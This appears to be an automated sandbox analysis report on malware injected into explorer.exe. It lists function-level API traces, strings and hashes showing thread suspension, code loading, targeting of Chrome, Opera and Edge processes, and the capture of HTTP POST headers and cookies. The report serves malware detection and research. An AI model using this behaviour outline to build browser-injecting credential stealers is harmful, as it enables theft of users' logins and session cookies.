API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$ntdll$opera_shared_counter
API String ID: 1066286714-2737717697
Opcode ID: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
Instruction ID: b8529cd7b6f7b3f81938f29da9ae38e819e5d60d405e704a022585a417c3316f
Opcode Fuzzy Hash: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
Instruction Fuzzy Hash: 56616D71508315AFE710AF658C88E6B7BECFB88754F000629BA89D3291D778DD058F66

Function 0008118D Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
lstrlen.KERNEL32(?,00000000), ref: 000811C9
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
wsprintfA.USER32 ref: 00081205
CryptDestroyHash.ADVAPI32(?), ref: 0008121E
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228

Strings

%02X, xrefs: 000811FF

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
Instruction ID: 298286c9a9371f5bd7e7a063f8446572b34c6f4efce2401be2fb8dd3adceacc5
Opcode Fuzzy Hash: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
Instruction Fuzzy Hash: 62113D71900109BFEB119F95EC88EEFBBBCFB44701F104065F645E2150DB754E559B60

Function 000816C7 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 000816D9
GetCurrentThreadId.KERNEL32 ref: 000816E1
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008171E
SuspendThread.KERNEL32(00000000), ref: 0008172E
CloseHandle.KERNEL32(00000000), ref: 0008173D
Thread32Next.KERNEL32(00000000,0000001C), ref: 0008174D
CloseHandle.KERNEL32(00000000), ref: 00081758

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
Instruction ID: 9f8a97b458fd6a1e1d725efe8f807f36da717ca79b52438bb26f371cecc15507
Opcode Fuzzy Hash: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
Instruction Fuzzy Hash: 53113C72408212EBE711AF60AC48AAFBFF8FF85711F05041DF6C592150D738894A9FA7

Function 00082E1B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92

Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027

Strings

NetworkService, xrefs: 00082E8A

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Process$Heap$InformationQuery$AllocateFreeOpen
String ID: NetworkService
API String ID: 1656241333-2019834739
Opcode ID: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
Instruction ID: 2a2cb19856545ee97dced0d83344d7303902199a923c80ef4bb46b56f5b20446
Opcode Fuzzy Hash: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
Instruction Fuzzy Hash: EC01D471300346BFE7247B219C49FAB3A9DFFD8392F014029F68AD6142DAB59C808B20

Function 00081E4C Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 00081E83
LoadLibraryA.KERNEL32(?), ref: 00081EAB
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00081ED8
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081F29

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
Instruction ID: 568ebf0d0beaab3ca419b44d6bddffa2e7cdb8569d387974d06ed25d6f468c67
Opcode Fuzzy Hash: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
Instruction Fuzzy Hash: A4317A72700216ABCB689F29CC84BA6B7ECFF15354B15456CE986CB201D735E846CBA4

Function 00082EA8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(chrome.exe|opera.exe|msedge.exe,?), ref: 00082EB4

Part of subcall function 00082E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
Part of subcall function 00082E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92

Strings

chrome.exe|opera.exe|msedge.exe, xrefs: 00082EAB

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Process$InformationQuery$Open
String ID: chrome.exe|opera.exe|msedge.exe
API String ID: 4117927671-3743313796
Opcode ID: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
Instruction ID: 74462bb72cca3f48bcbab1f2b981006a3a1547241742571b3dc85306c1ef6728
Opcode Fuzzy Hash: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
Instruction Fuzzy Hash: C6D0A932300222072B2C367A6C0A86FA48DEBC2A62302013EF982C7240EA908C0343A4

Function 00082974 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 157
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056

Part of subcall function 0008285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 000828A2

lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00082A4A
lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00082A6C
lstrcat.KERNEL32(?,dyn_header_ua), ref: 00082A8D
RtlZeroMemory.NTDLL(?,0000000A), ref: 00082A96
StrToIntA.SHLWAPI(00000000), ref: 00082AB9
wnsprintfA.SHLWAPI ref: 00082B0D
lstrcat.KERNEL32(00000000,?), ref: 00082B2D
lstrcat.KERNEL32(00000000,{:!:}), ref: 00082B35
lstrcat.KERNEL32(00000000,?), ref: 00082B3C

Strings

:method POST, xrefs: 000829D1
:path , xrefs: 00082A50
{:!:}, xrefs: 00082B2F
user-agent , xrefs: 00082A72
:authority , xrefs: 00082A17
dyn_header_path, xrefs: 00082A66
dyn_header_host, xrefs: 00082A44
dyn_header_ua, xrefs: 00082A87
content-length , xrefs: 00082AA0
%s (HTTP2){:!:}%s%s{:!:}%s{:!:}, xrefs: 00082B06
host , xrefs: 00082A33

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
API String ID: 2605944266-950501416
Opcode ID: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
Instruction ID: d8dd03a251d738af89b9767004e5c399ca865ed0c4bb03e024ab117a7b61717e
Opcode Fuzzy Hash: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
Instruction Fuzzy Hash: BF516D706043419BDB19BF24C984AAEBBDABF98304F04081DF8C597293DB78DC468B66

Function 00082FAA Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 124stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155

RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
StrToIntA.SHLWAPI(?), ref: 00083024
lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
wsprintfA.USER32 ref: 000830B9
lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
lstrcat.KERNEL32(?,{:!:}), ref: 000830F8
lstrlen.KERNEL32(?,?,?,?,?,?,?,00086038), ref: 00083109
RtlMoveMemory.NTDLL(00000000), ref: 00083112

Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027

Strings

Cookie:, xrefs: 000830CE
application/json, xrefs: 00082FC5
Content-Length:, xrefs: 00083004
User-Agent:, xrefs: 00083094
{:!:}, xrefs: 000830F2
, xrefs: 00083068
%s{:!:}%s{:!:}%s{:!:}, xrefs: 000830B3
application/x-www-form-urlencoded, xrefs: 00082FAD
Host:, xrefs: 0008303B

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
API String ID: 2886538537-1627781280
Opcode ID: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
Instruction ID: 0ab628cf7cdd2d7bd700d5d11cd162a6a2ce618acf256a36fb072680de120010
Opcode Fuzzy Hash: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
Instruction Fuzzy Hash: 243193313002466BD704BB248C59BAF36AEBFC4B41F00443CFAC297283DA7999468BA1

Function 00083132 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 0008322D
wsprintfA.USER32 ref: 0008329E
lstrcat.KERNEL32(00000000,00000000), ref: 000832AF
lstrcat.KERNEL32(00000000,{:!:}), ref: 000832BE
lstrlen.KERNEL32(00000000), ref: 000832C1
RtlMoveMemory.NTDLL(00000000,?,?), ref: 000832D2

Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027

Strings

POST, xrefs: 0008327F
{:!:}, xrefs: 000832B8
%s{:!:}%s{:!:}%s{:!:}, xrefs: 00083298

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
API String ID: 3430864794-1604029033
Opcode ID: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
Instruction ID: 195aec8412d902ec1d20601123c3bc2efe934f71044cf50dfad01e2279433394
Opcode Fuzzy Hash: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
Instruction Fuzzy Hash: 23415E71104345AFD311EF10DC48EABBBEDFF88745F00092EF58296252DB799A49CBA6

Function 00083449 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 109stringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00086038), ref: 00083455
lstrcat.KERNEL32 ref: 000834AB

Part of subcall function 00082FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
Part of subcall function 00082FAA: StrToIntA.SHLWAPI(?), ref: 00083024
Part of subcall function 00082FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
Part of subcall function 00082FAA: wsprintfA.USER32 ref: 000830B9
Part of subcall function 00082FAA: lstrcat.KERNEL32(00000000,00000000), ref: 000830E5

Part of subcall function 00082F1F: CreateThread.KERNEL32(00000000,00000000,00082ED2,?,00000000,00000000), ref: 00082F2F
Part of subcall function 00082F1F: CloseHandle.KERNEL32(00000000), ref: 00082F36

Part of subcall function 0008105D: VirtualFree.KERNEL32(?,00000000,00008000,00082B4B), ref: 00081065

RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00083504
StrToIntA.SHLWAPI(?), ref: 0008352B
RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0008358D
RtlLeaveCriticalSection.NTDLL(00086038), ref: 000835C1

Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281

Strings

POST, xrefs: 000834F1
Content-Length:, xrefs: 0008350E
, xrefs: 0008353D

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
String ID: $Content-Length:$POST
API String ID: 2960674810-114478848
Opcode ID: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
Instruction ID: 94e072d73854c321fe1628760210cd651d563a19d9d3a009ac864edf1f9d31a3
Opcode Fuzzy Hash: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
Instruction Fuzzy Hash: 7931C4306043418BEB11BF64D9686AB7BA9BF84701F01042DEAC29B353CB7E990DCF59

Function 0008186C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

Part of subcall function 0008106C: lstrlen.KERNEL32(?,?,00000000,00000000,0008189F,75712B62,?,00000000), ref: 00081074
Part of subcall function 0008106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00081086

Part of subcall function 000817DC: RtlZeroMemory.NTDLL(?,00000018), ref: 000817EE

RtlZeroMemory.NTDLL(?,0000003C), ref: 000818FB
wsprintfW.USER32 ref: 000819F2
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00081AD0

Strings

Accept: */*Referer: %S, xrefs: 000819E8
Content-Type: application/x-www-form-urlencoded, xrefs: 00081A34
POST, xrefs: 000819A0

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 3833683434-704803497
Opcode ID: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
Instruction ID: 3dcbdeb0ded9a8cf15a9f97d83848ce06ad77dce3e8d70dcbeb4fea29dcfcf14
Opcode Fuzzy Hash: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
Instruction Fuzzy Hash: 648145B1608301AFD714AF68DC88AABBAEDFF88744F00092DF585D3251EB75D946CB52

Function 000823E3 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 190stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056

lstrcat.KERNEL32(?,00000000), ref: 000825BB
lstrcat.KERNEL32(?,000842A8), ref: 000825C7
lstrcat.KERNEL32(?,?), ref: 000825D6
lstrcat.KERNEL32(?,000842AC), ref: 000825E5

Strings

?, xrefs: 00082463
:authority, xrefs: 0008243A
dyn_header, xrefs: 000824C8

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: lstrcat$AllocVirtual
String ID: :authority$?$dyn_header
API String ID: 3028025275-1785586894
Opcode ID: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
Instruction ID: a3df1192de0655e9dc7a3e2b16972a5207b0361e37cf12fd9c8c807a48e009f7
Opcode Fuzzy Hash: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
Instruction Fuzzy Hash: CC61E3725087128FC710FE24D5906AEB7E6BB94350F44092DF8C157283EA399E0EDB62

Function 000828AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155

RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0008291B
lstrcat.KERNEL32(?,000842BC), ref: 0008292A
lstrlen.KERNEL32(?,75712B62,00000001,?,?,00000000,?,?,00082B26,?,?,?,?,00000001), ref: 0008295C

Strings

cookie , xrefs: 000828D4, 0008293C

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: lstrlen$MemoryMovelstrcat
String ID: cookie
API String ID: 2957667536-1295510418
Opcode ID: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
Instruction ID: f53226ebe774a6e1b9e5076833723ffb49a62c81fd320fd2bb11fdc6a523b402
Opcode Fuzzy Hash: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
Instruction Fuzzy Hash: 0411B7323083029BD711BE94DC89B9BB7D9FF90714F14052DFDC197242EAB5E80A4791

Function 000812AA Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000), ref: 000812BC
IsWow64Process.KERNEL32(000000FF,?), ref: 000812CE
IsWow64Process.KERNEL32(00000000,?), ref: 000812E1
CloseHandle.KERNEL32(00000000), ref: 000812F7

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID:
API String ID: 331459951-0
Opcode ID: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
Instruction ID: 4c13458c48fa9fbbcfea10e07012997bffba25426b6b543f99b22ac2bec5ef8b
Opcode Fuzzy Hash: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
Instruction Fuzzy Hash: 1DF09071806219FFAB20DFA0AD449EFBBBCFF01251F20426AE941D2140DB354E029BA1

Function 000832F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00086038), ref: 00083332
RtlLeaveCriticalSection.NTDLL(00086038), ref: 00083358

Strings

POST, xrefs: 00083338

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: POST
API String ID: 3168844106-1814004025
Opcode ID: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
Instruction ID: 55dcfb8202f6423abaeb440588ec9f58bbec6868fc7e7fe62f416efc705c6caf
Opcode Fuzzy Hash: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
Instruction Fuzzy Hash: 63018131500114EBDB213F20EC4889F7FA9FFC5BA17184020FA8A96222DF36DE51DBA1

Analysis Process: explorer.exePID: 3208, Parent PID: 1244COMMON

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	23.1%
Signature Coverage:	0%
Total number of Nodes:	39
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 000E1DB0 Relevance: 1.6, APIs: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 000E1E03

Part of subcall function 000E1EB4: FindFirstFileW.KERNELBASE ref: 000E1F05

Memory Dump Source

Source File: 00000017.00000002.545405224.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_e1000_explorer.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
Instruction ID: f38ae4037610437375f10b6af05255b121b6e9b397242c6b965d87fbfa301cc4
Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
Instruction Fuzzy Hash: A9218F3021CE484FDB98EB2DA8992ED77D1EB98350F40066DF98ED3296DE3899058785

Function 000E1EB4 Relevance: 1.6, APIs: 1, Instructions: 94
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000E1DB0: FindFirstFileW.KERNELBASE ref: 000E1E03

FindFirstFileW.KERNELBASE ref: 000E1F05

Memory Dump Source

Source File: 00000017.00000002.545405224.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_e1000_explorer.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
Instruction ID: 47430f8b37c49c67edc128d8763d7eb6b8b0d83c5ce7b1bd90213d5e2d146c9d
Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
Instruction Fuzzy Hash: 1521217020CA484FDF44FF2998997ED77E1EBA8344F00066DE55AD3292DF38D9448785

Function 000E5300 Relevance: 1.6, APIs: 1, Instructions: 71
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 000E5378

Memory Dump Source

Source File: 00000017.00000002.545405224.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_e1000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
Instruction ID: bd129d4dbaa6a4f5a0d3126f6d5f59154c7ee90844e48c327c9209267a2d9f65
Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
Instruction Fuzzy Hash: 1411C630601D894FEB9DF7BA58992B933D5EB58306F64093AE415D72A6DE798B808300

Function 000E1D08 Relevance: 7.5, APIs: 5, Instructions: 47
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 000E1D1D
Process32First.KERNEL32 ref: 000E1D3C
lstrcmpi.KERNEL32 ref: 000E1D4C
Process32Next.KERNEL32 ref: 000E1D67
CloseHandle.KERNELBASE ref: 000E1D74

Memory Dump Source

Source File: 00000017.00000002.545405224.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_e1000_explorer.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
String ID:
API String ID: 868014591-0
Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
Instruction ID: 0459a99c9ea60d1701a80b016c2f68b58b576c4bcdc1a58c2692bd300445daa6
Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
Instruction Fuzzy Hash: F5018F30208A088FD755EB29DC883EE76E2FBD8314F000A2DA15AD2194DB3889458B45

Function 000ED748 Relevance: 4.7, APIs: 3, Instructions: 246
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 000ED847
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 000ED8E5
VirtualProtect.KERNELBASE ref: 000ED903

Memory Dump Source

Source File: 00000017.00000002.545405224.00000000000EC000.00000040.80000000.00040000.00000000.sdmp, Offset: 000EC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_ec000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
Instruction ID: d53d9f834d506e3d4ff3502a79634dc9814ab7a84ab47d8519c68a9da176717b
Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
Instruction Fuzzy Hash: 1D51893236899D0FDB28AB3D9CC43F9B7D1F759325B58063BC4DAD3285EA58C8468381

Function 000E4914 Relevance: 3.1, APIs: 2, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000E1D08: CreateToolhelp32Snapshot.KERNEL32 ref: 000E1D1D
Part of subcall function 000E1D08: Process32First.KERNEL32 ref: 000E1D3C
Part of subcall function 000E1D08: CloseHandle.KERNELBASE ref: 000E1D74

Part of subcall function 000E1D08: lstrcmpi.KERNEL32 ref: 000E1D4C
Part of subcall function 000E1D08: Process32Next.KERNEL32 ref: 000E1D67

SleepEx.KERNEL32 ref: 000E4952
